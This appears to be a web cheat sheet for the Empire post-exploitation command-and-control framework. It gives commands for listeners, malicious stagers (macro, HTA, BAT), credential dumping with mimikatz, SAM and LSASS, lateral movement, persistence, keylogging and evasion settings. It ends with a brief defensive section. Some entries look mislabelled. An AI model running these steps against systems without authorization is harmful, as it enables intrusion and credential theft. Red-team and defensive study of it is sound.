Empire Framework Cheat Sheet

Overview

Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure Python 3 Linux/macOS agent. It provides a powerful command and control (C2) infrastructure for red team operations, penetration testing, and adversary emulation.

⚠️ Warning: Empire is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

From GitHub

bash

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh

Using Docker

bash

# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest

On Kali Linux

bash

# Install from package manager
sudo apt update
sudo apt install powershell-empire

Basic Usage

Starting Empire

bash

# Start the Empire server
sudo empire

# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>

Using Starkiller (GUI)

bash

# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller

Command	Description
`help`	Display help menu
`menu`	Return to the main menu
`back`	Go back one menu level
`exit`	Exit Empire
`usemodule <module>`	Select a module to use
`usestager <stager>`	Select a stager to use
`uselistener <listener>`	Select a listener to use
`interact <agent>`	Interact with an agent
`searchmodule <term>`	Search for modules

Listeners

Creating a Listener

# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute

Common Listener Options

Option	Description
`Name`	Name for the listener
`Host`	IP/hostname for staging
`Port`	Port for the listener
`CertPath`	Certificate path for HTTPS
`DefaultDelay`	Agent callback delay (in seconds)
`DefaultJitter`	Jitter in agent callbacks (0.0-1.0)
`DefaultProfile`	Default communication profile
`KillDate`	Date for the listener to exit (MM/DD/YYYY)
`WorkingHours`	Hours for the agent to callback (09:00-17:00)

Listener Management

# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener

Stagers

Generating a Stager

# In Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate

Common Stager Types

Stager	Description
`windows/launcher_bat`	BAT file launcher
`windows/launcher_vbs`	VBS script launcher
`windows/launcher_powershell`	PowerShell launcher
`multi/launcher`	Multi-platform launcher
`osx/launcher`	macOS launcher
`linux/launcher`	Linux launcher
`windows/dll`	DLL launcher
`windows/macro`	Office macro launcher
`windows/hta`	HTA launcher

Agents

Agent Commands

# List all agents
agents

# Interact with an agent
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell command
powershell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit agent menu
back

Agent Management

# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set sleep interval
sleep 30

# Set jitter percentage
sysinfo

Modules

Using Modules

# List available modules
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Set module options
set Username administrator

# Execute the module
execute

Common Module Categories

Credential Access

# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump SAM database
usemodule powershell/credentials/sam

# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump

Situational Awareness

# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group

Lateral Movement

# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec

# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm

Persistence

# Registry persistence
usemodule powershell/persistence/userland/registry

# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks

# WMI persistence
usemodule powershell/persistence/elevated/wmi

Advanced Features

Malleable C2 Profiles

# In Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile

OPSEC Considerations

# Set agent kill date
set KillDate 01/01/2025

# Set working hours
set WorkingHours 09:00-17:00

# Increase agent sleep time
sleep 300 30

Data Exfiltration

# Use keylogging module
usemodule powershell/collection/keylogger

# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Use screenshot module
usemodule powershell/collection/screenshot

Troubleshooting

Common Issues

Connection Problems

bash

# Check if the listener is running
listeners

# Verify firewall settings
sudo iptables -L

# Check for port conflicts
netstat -tuln | grep <port>

Agent Not Checking In

bash

# Verify agent is running
agents

# Check for network connectivity issues
# Verify sleep/jitter settings

Module Execution Failures

bash

# Check module requirements
info

# Verify agent privileges
shell whoami

# Try running in a different process context
usemodule powershell/management/psinject

Defensive Measures

Detection Methods

PowerShell Script Block Logging
PowerShell Module Logging
AMSI (Antimalware Scan Interface)
Network traffic analysis
Behavioral analysis

Prevention Techniques

powershell

# Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1

# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Resources

This cheat sheet provides a comprehensive reference for using Empire in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.

Empire Framework Cheat Sheet ​

Overview ​

Installation ​

From GitHub ​

Using Docker ​

On Kali Linux ​

Basic Usage ​

Starting Empire ​

Using Starkiller (GUI) ​

Empire CLI Navigation ​

Listeners ​

Creating a Listener ​

Common Listener Options ​

Listener Management ​

Stagers ​

Generating a Stager ​

Common Stager Types ​

Agents ​

Agent Commands ​

Agent Management ​

Modules ​

Using Modules ​

Common Module Categories ​

Credential Access ​

Situational Awareness ​

Lateral Movement ​

Persistence ​

Advanced Features ​

Malleable C2 Profiles ​

OPSEC Considerations ​

Data Exfiltration ​

Troubleshooting ​

Common Issues ​

Defensive Measures ​

Detection Methods ​

Prevention Techniques ​

Resources ​

Empire Framework Cheat Sheet

Overview

Installation

From GitHub

Using Docker

On Kali Linux

Basic Usage

Starting Empire

Using Starkiller (GUI)

Empire CLI Navigation

Listeners

Creating a Listener

Common Listener Options

Listener Management

Stagers

Generating a Stager

Common Stager Types

Agents

Agent Commands

Agent Management

Modules

Using Modules

Common Module Categories

Credential Access

Situational Awareness

Lateral Movement

Persistence

Advanced Features

Malleable C2 Profiles

OPSEC Considerations

Data Exfiltration

Troubleshooting

Common Issues

Defensive Measures

Detection Methods

Prevention Techniques

Resources